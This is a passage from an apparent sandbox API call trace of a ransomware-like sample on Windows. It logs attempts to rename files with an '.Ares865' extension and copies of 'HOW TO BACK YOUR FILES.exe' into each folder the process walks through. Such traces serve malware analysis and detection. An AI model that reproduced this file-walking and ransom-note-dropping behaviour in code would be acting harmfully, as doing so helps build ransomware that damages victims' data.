Files\\Content.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b5ebfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b5ebfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.943] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 98 [0110.943] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0110.943] GetLastError () returned 0x20 [0110.943] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 120 [0110.943] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 120 [0110.943] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0110.944] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x76d4 [0110.944] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x78, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x78, lpOverlapped=0x0) returned 1 [0110.945] CloseHandle (hObject=0x118) returned 1 [0110.945] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0110.945] CloseHandle (hObject=0x0) returned 0 [0110.945] CloseHandle (hObject=0x0) returned 0 [0110.945] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0110.945] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0110.945] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0110.946] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.946] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.946] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.947] GetLastError () returned 0x0 [0110.947] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.947] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.947] CloseHandle (hObject=0x120) returned 1 [0110.947] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.947] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b612140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b612140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.947] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0110.947] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0110.948] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.948] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.948] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.949] GetLastError () returned 0x0 [0110.949] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.949] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.949] CloseHandle (hObject=0x120) returned 1 [0110.949] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.949] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b612140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b612140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.949] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0110.950] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0110.950] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.950] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.950] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.951] GetLastError () returned 0x0 [0110.951] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.951] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.951] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0110.951] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0110.951] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.952] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.952] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.953] GetLastError () returned 0x0 [0110.953] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.953] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.953] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla" [0110.953] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla" [0110.953] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.953] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.954] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.954] GetLastError () returned 0x0 [0110.954] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.955] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d6df460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6df460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.955] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates" [0110.955] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates" [0110.955] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.955] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.956] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.956] GetLastError () returned 0x0 [0110.956] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.956] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d6df460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6df460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.957] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B" [0110.959] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B" [0110.960] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.960] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.960] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.961] GetLastError () returned 0x0 [0110.961] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.961] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d72b720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d72b720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.961] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates" [0110.961] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates" [0110.961] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.962] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.962] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.962] GetLastError () returned 0x0 [0110.963] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.963] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb74b7b30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d72b720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d72b720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.963] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0" [0110.963] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0" [0110.963] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.963] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.964] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.964] GetLastError () returned 0x0 [0110.964] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.964] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb74b7b30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6b65e400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b65e400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, 